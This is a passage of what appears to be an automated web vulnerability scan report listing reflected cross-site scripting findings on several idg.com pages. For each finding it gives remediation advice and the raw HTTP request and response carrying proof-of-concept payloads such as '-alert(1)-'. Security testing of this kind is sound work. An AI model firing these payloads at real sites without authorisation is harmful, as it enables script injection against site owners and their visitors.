HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:46 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5019 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/U.S._Sales5e4f8";82b293410c0"); } catch(err) {}</script> ...[SNIP]...
2.125. http://idg.com/www/HomeNew.nsf/docs/U.S._Sales [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/HomeNew.nsf/docs/U.S._Sales
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 658e5"-alert(1)-"271304f8b46 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/U.S._Sales?658e5"-alert(1)-"271304f8b46=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:44 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5032 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/U.S._Sales?658e5"-alert(1)-"271304f8b46=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4cd23"%3b6009fde32 was submitted in the REST URL parameter 1. This input was echoed as 4cd23";6009fde32 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www4cd23"%3b6009fde32/HomeNew.nsf/docs/about_IDG HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:45 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5016 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www4cd23";6009fde32/HomeNew.nsf/docs/about_IDG"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 770bb"%3b7fc456656cc was submitted in the REST URL parameter 3. This input was echoed as 770bb";7fc456656cc in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs770bb"%3b7fc456656cc/about_IDG HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:46 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5018 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs770bb";7fc456656cc/about_IDG"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8e603"%3b0d69f7e74a7 was submitted in the REST URL parameter 4. This input was echoed as 8e603";0d69f7e74a7 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/about_IDG8e603"%3b0d69f7e74a7 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:50 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5018 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/about_IDG8e603";0d69f7e74a7"); } catch(err) {}</script> ...[SNIP]...
2.129. http://idg.com/www/HomeNew.nsf/docs/about_IDG [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/HomeNew.nsf/docs/about_IDG
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6071f"-alert(1)-"5649c346001 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/about_IDG?6071f"-alert(1)-"5649c346001=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:45 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5031 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/about_IDG?6071f"-alert(1)-"5649c346001=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 681e8"%3b4555cf79d0f was submitted in the REST URL parameter 1. This input was echoed as 681e8";4555cf79d0f in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www681e8"%3b4555cf79d0f/HomeNew.nsf/docs/company_milestones HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:49 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5027 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www681e8";4555cf79d0f/HomeNew.nsf/docs/company_milestones"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4851"%3b9ad27ea35 was submitted in the REST URL parameter 3. This input was echoed as f4851";9ad27ea35 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docsf4851"%3b9ad27ea35/company_milestones HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:52 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5025 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docsf4851";9ad27ea35/company_milestones"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 60f25"%3b04c47483c89 was submitted in the REST URL parameter 4. This input was echoed as 60f25";04c47483c89 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/company_milestones60f25"%3b04c47483c89 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:52 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5027 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/company_milestones60f25";04c47483c89"); } catch(err) {}</script> ...[SNIP]...
2.133. http://idg.com/www/HomeNew.nsf/docs/company_milestones [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/HomeNew.nsf/docs/company_milestones
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 905aa"-alert(1)-"d72675069e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/company_milestones?905aa"-alert(1)-"d72675069e7=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:48 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5040 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/company_milestones?905aa"-alert(1)-"d72675069e7=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1873a"%3b8cbab62b12d was submitted in the REST URL parameter 1. This input was echoed as 1873a";8cbab62b12d in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www1873a"%3b8cbab62b12d/HomeNew.nsf/docs/contact_us HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:53 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5019 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www1873a";8cbab62b12d/HomeNew.nsf/docs/contact_us"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3070d"%3b8635bbbc483 was submitted in the REST URL parameter 3. This input was echoed as 3070d";8635bbbc483 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs3070d"%3b8635bbbc483/contact_us HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:54 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5019 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs3070d";8635bbbc483/contact_us"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 48944"%3b28ffbbcf7d6 was submitted in the REST URL parameter 4. This input was echoed as 48944";28ffbbcf7d6 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/contact_us48944"%3b28ffbbcf7d6 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:56 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5019 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/contact_us48944";28ffbbcf7d6"); } catch(err) {}</script> ...[SNIP]...
2.137. http://idg.com/www/HomeNew.nsf/docs/contact_us [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/HomeNew.nsf/docs/contact_us
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 31f7e"-alert(1)-"b3cc543f05e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/contact_us?31f7e"-alert(1)-"b3cc543f05e=1 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 400 Bad Request Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:53 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5032 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/contact_us?31f7e"-alert(1)-"b3cc543f05e=1"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 26bfa"%3b1baf8807546 was submitted in the REST URL parameter 1. This input was echoed as 26bfa";1baf8807546 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www26bfa"%3b1baf8807546/HomeNew.nsf/docs/corporate_profile HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:45 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5026 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www26bfa";1baf8807546/HomeNew.nsf/docs/corporate_profile"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6119f"%3b71da451f5 was submitted in the REST URL parameter 3. This input was echoed as 6119f";71da451f5 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs6119f"%3b71da451f5/corporate_profile HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:46 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5024 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs6119f";71da451f5/corporate_profile"); } catch(err) {}</script> ...[SNIP]...
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f6379"%3b8834bed9364 was submitted in the REST URL parameter 4. This input was echoed as f6379";8834bed9364 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /www/HomeNew.nsf/docs/corporate_profilef6379"%3b8834bed9364 HTTP/1.1 Host: idg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=237447256.1291272495.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/40; __utma=237447256.1048002661.1291272495.1291272495.1292502227.2; __utmc=237447256; __utmb=237447256.1.10.1292502227;
Response
HTTP/1.1 404 Not Found Server: Lotus-Domino Date: Thu, 16 Dec 2010 13:00:46 GMT Connection: close Expires: Tue, 01 Jan 1980 06:00:00 GMT Content-Type: text/html; charset=US-ASCII Content-Length: 5026 Cache-control: no-cache
<link rel="stylesheet" type="text/css" href="/www/homenew.nsf/screen2.css" media="all" /> <link rel="stylesheet" type="text/css" href="/www/homenew.nsf/style.css" /> <!-- Section for ordinary idg.co ...[SNIP]... <script type="text/javascript"> try { var pageTracker = _gat._getTracker("UA-79134-4"); pageTracker._trackPageview("IDG.com - Page not found - /www/HomeNew.nsf/docs/corporate_profilef6379";8834bed9364"); } catch(err) {}</script> ...[SNIP]...
2.141. http://idg.com/www/HomeNew.nsf/docs/corporate_profile [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://idg.com
Path:
/www/HomeNew.nsf/docs/corporate_profile
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 85712"-alert(1)-"9259a875ca6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
